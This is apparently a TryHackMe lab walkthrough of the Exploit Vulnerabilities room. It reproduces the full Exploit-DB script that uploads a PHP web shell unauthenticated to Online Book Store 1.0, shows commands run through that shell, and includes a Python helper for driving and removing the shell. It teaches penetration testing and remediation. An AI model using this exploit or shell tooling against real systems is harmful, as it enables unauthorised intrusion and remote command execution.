Exploit Vulnerabilities Walkthrough [TryHackMe]
I am going through the newly released Jr Penetration Tester Learning Path and I enjoyed this quick but cool challenge. I figured why not write a short and sweet walkthrough :)
Automated vs Manual Vulnerability Research
This section gives a brief introduction to vulnerability scanning: some basic information about the Nessus vulnerability scanner, and a look at the difference between running an automated scan and testing by hand.
Answers:
You are working close to a deadline for your penetration test and need to scan a web application quickly. Would you use an automated scanner? (Yay/Nay)
Yay. Time is a precious resource; an automated scanner covers a lot of ground quickly, and you can follow up its findings by hand where it matters.
You are testing a web application and find that you are able to input and retrieve data in a database. What vulnerability is this?
Injection. Being able to write to and read from the database through your own input means that input is reaching a query unsanitised; here that is SQL injection, though the same class also covers command injection.
You manage to impersonate another user. What vulnerability is this?
Broken Access Control. The application failed to check that we are allowed to act as that user, for example by trusting a user ID or session value we can choose ourselves. This is an authorisation failure, not an input sanitisation bug.
Finding Manual Exploits
Here we look at the different tools and resources we can leverage to get the work done.
Answers:
What website would you use as a security researcher if you wanted to upload a Proof of Concept?
GitHub. We can share code and other such things there :)
You are performing a penetration test at a site with no internet connection. What tool could you use to find exploits to use?
Searchsploit. It searches a local copy of the Exploit-DB archive, so it works with no network access; update the local copy (searchsploit -u) before you go on site.
Example of Manual Exploitation
Here the point is made that many of the exploits available to us are not ready to run as downloaded and may need modification first: paths, ports, credentials, or even the language version they were written for.
Answers:
What type of vulnerability was used in this attack?
Remote Code Execution. The example showed us that we were able to run commands on the remote server.
Practical: Manual Exploitation
Let's put all this information into practice!
Here we are given a target website. Mine was located at 10.10.9.18.
I loaded http://10.10.9.18 in the web browser and found the name and version of the web app on the right-hand side of the page. We can take advantage of this disclosure of the application name and version number to see if we can find any known vulnerabilities related to it.
I did a quick search for Online Book Store v1.0 exploit. After looking through some of the results, I found this one for an unauthenticated RCE in Exploit-DB: https://www.exploit-db.com/exploits/47887
# Exploit Title: Online Book Store 1.0 - Unauthenticated Remote Code Execution
# Google Dork: N/A
# Date: 2020-01-07
# Exploit Author: Tib3rius
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
# Version: 1.0
# Tested on: Ubuntu 16.04
# CVE: N/A

# Written for Python 3: input() returns the typed text as a string. Under
# Python 2, input() evaluates the reply as an expression, which is what makes
# the interactive prompt below crash when the script is started with "python".
import argparse
import random
import requests
import string
import sys

parser = argparse.ArgumentParser()
parser.add_argument('url', action='store', help='The URL of the target.')
args = parser.parse_args()

url = args.url.rstrip('/')

# Random file name so the uploaded shell does not sit at a guessable path.
random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))

# One-line PHP web shell: runs the cmd query parameter through the system shell.
payload = '<?php echo shell_exec($_GET[\'cmd\']); ?>'

# The upload form field is named "image"; a .php file is accepted in its place.
file = {'image': (random_file + '.php', payload, 'text/php')}

print('> Attempting to upload PHP web shell...')
# admin_add.php takes the upload without any authentication; add=1 mimics the submit button.
r = requests.post(url + '/admin_add.php', files=file, data={'add':'1'}, verify=False)

print('> Verifying shell upload...')
# Uploads land in bootstrap/img/ under the web root; ask the shell to echo the random name back.
r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)

if random_file in r.text:
    print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php')
    print('> Example command usage: ' + url + '/bootstrap/img/' + random_file + '.php?cmd=whoami')
    launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))
    if launch_shell.lower() == 'y':
        while True:
            cmd = str(input('RCE $ '))
            if cmd == 'exit':
                sys.exit(0)
            r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':cmd}, verify=False)
            print(r.text)
else:
    if r.status_code == 200:
        print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')
    else:
        print('> Web shell failed to upload! The web server may not have write permissions.')
Let's go over at a high level what the code is doing…
- It takes the URL of the site as a parameter.
- It creates a random file name, so the shell does not end up at a path anyone could guess.
- That file contains the one-line PHP web shell <?php echo shell_exec($_GET['cmd']); ?>, which runs whatever we pass in the cmd query parameter as a system command and echoes the output back.
- It leverages the vulnerability to push this file: admin_add.php accepts the multipart upload without any login, takes a .php file in the image field, and stores it under /bootstrap/img/, which is inside the web root.
- The web server then treats the uploaded file as PHP and executes it when we request it. RCE!
- It verifies the upload by asking the shell to echo the random name and checking that the name comes back in the response.
Running The Exploit
After downloading the exploit, I didn't see a need to change or adjust any of the code; it looked pretty straightforward. To run it I gave the command python ./47887.py http://10.10.9.18/, and here is what the output looks like:
python ./47887.py http://10.10.9.18/
> Attempting to upload PHP web shell...
> Verifying shell upload...
> Web shell uploaded to http://10.10.9.18/bootstrap/img/2zQ3veqXvS.php
> Example command usage: http://10.10.9.18/bootstrap/img/2zQ3veqXvS.php?cmd=whoami
> Do you wish to launch a shell here? (y/n): y
Traceback (most recent call last):
  File "./47887.py", line 35, in <module>
    launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))
  File "<string>", line 1, in <module>
NameError: name 'y' is not defined
From the output we can see that the script crashed, but only after the web shell had been uploaded and verified, so the crash is not a worry for the rest of the exercise. The remaining code only provides an interactive prompt for sending commands. The traceback also tells us why it crashed: the script was started with python, which on this machine is Python 2, and Python 2's input() evaluates whatever is typed as a Python expression, so the reply y became a lookup of an undefined name. The script is written for Python 3; running python3 ./47887.py http://10.10.9.18/ gives a working prompt. This is exactly the kind of small adjustment the previous task warned about.
The next step is to test the web shell in the browser. Let's open this URL and see what we get:
http://10.10.9.18/bootstrap/img/2zQ3veqXvS.php?cmd=whoami
#Output:
www-data
Nice, let’s do a bit more digging:
#Command
http://10.10.9.18/bootstrap/img/2zQ3veqXvS.php?cmd=lsb_release+-a
#Output
Distributor ID: Ubuntu
Description:    Ubuntu 18.04.6 LTS
Release:        18.04
Codename:       bionic
#Command
http://10.10.9.18/bootstrap/img/2zQ3veqXvS.php?cmd=pwd
#Output
/var/www/html/bootstrap/img
#Command
http://10.10.9.18/bootstrap/img/2zQ3veqXvS.php?cmd=ls
#Output
2zQ3veqXvS.php OyWjgNLIbq.php android_studio.jpg beauty_js.jpg c_14_quick.jpg c_sharp_6.jpg doing_good.jpg flag.txt img1.jpg img2.jpg img3.jpg kotlin_250x250.png logic_program.jpg mobile_app.jpg pro_asp4.jpg pro_js.jpg unnamed.png web_app_dev.jpg
It looks like this directory contains flag.txt, which is what we are looking for. Note the second ten-character .php file next to ours, OyWjgNLIbq.php: it looks like a shell left behind by an earlier run of the exploit. On a real engagement, remove your shell once you are done, because a forgotten web shell is an open door for anyone who finds it. Let's run the following: http://10.10.9.18/bootstrap/img/2zQ3veqXvS.php?cmd=cat+flag.txt
#Output
`THM{B***_******G}`
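Driving the shell from the browser means hand-encoding each command (spaces as +, as in lsb_release+-a), which breaks as soon as a command contains &, #, % or a literal +. The following is an added example, my own code rather than anything from the original post or the exploit, that percent-encodes the command properly and, when you are finished, deletes the shell through itself and confirms it is gone. It assumes the base URL and shell path are passed on the command line; the script name in the usage comment is hypothetical.

```python
import sys
import urllib.error
import urllib.request
from urllib.parse import quote


def shell_url(base_url: str, shell_path: str, cmd: str) -> str:
    """Build the web-shell URL with the command fully percent-encoded.
    In a hand-typed URL '&' and '#' would end the parameter, '%' would start
    an escape and '+' would turn into a space; PHP decodes %XX sequences back
    into the original bytes before shell_exec() sees them, so any command
    survives the query string this way."""
    return f"{base_url.rstrip('/')}/{shell_path.lstrip('/')}?cmd={quote(cmd, safe='')}"


def run(base_url: str, shell_path: str, cmd: str, timeout: float = 10) -> str:
    """Send one command through the shell and return its raw output (network call)."""
    with urllib.request.urlopen(shell_url(base_url, shell_path, cmd), timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


def remove_shell(base_url: str, shell_path: str) -> bool:
    """Delete the uploaded shell through itself, then confirm it is gone.
    PHP has already read the script by the time shell_exec() runs, so it can
    unlink itself, and the commands run with the script's own directory as the
    working directory (the walkthrough's pwd shows /var/www/html/bootstrap/img).
    Returns True only when the server now answers 404 for the shell's URL."""
    filename = shell_path.rsplit("/", 1)[-1]
    run(base_url, shell_path, f"rm -f -- {filename}")
    try:
        urllib.request.urlopen(shell_url(base_url, shell_path, "id"), timeout=10)
    except urllib.error.HTTPError as err:
        return err.code == 404
    return False  # still served: the delete did not happen


if __name__ == "__main__":
    # Usage: python3 drive_shell.py http://10.10.9.18 bootstrap/img/2zQ3veqXvS.php
    base, path = sys.argv[1], sys.argv[2]
    for command in ("whoami", "lsb_release -a", "cat flag.txt | wc -c"):
        print(f"$ {command}\n{run(base, path, command)}")
    print("shell removed:", remove_shell(base, path))
```

The cleanup check matters more than it looks: a 200 after the rm means the file is still there (wrong working directory, or a different user owns it), and you should not report the host as clean until the request really returns 404.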
As much as I would love to just give you the flag, you need to put the skills into practice. If this walkthrough is not clear enough, reach out so you can do this too :)
RECAP
Here we took advantage of the application name and version being displayed to us, some nice and easy OSINT. From there we researched whether there were any known vulnerabilities for this app and version, then found an exploit that allowed us to run code on the server. Fixing the upload handler (requiring admin authentication on admin_add.php, rejecting anything that is not an image, and storing uploads outside the web root) would have prevented this; hiding the version string alone would only have made the exploit slightly harder to find.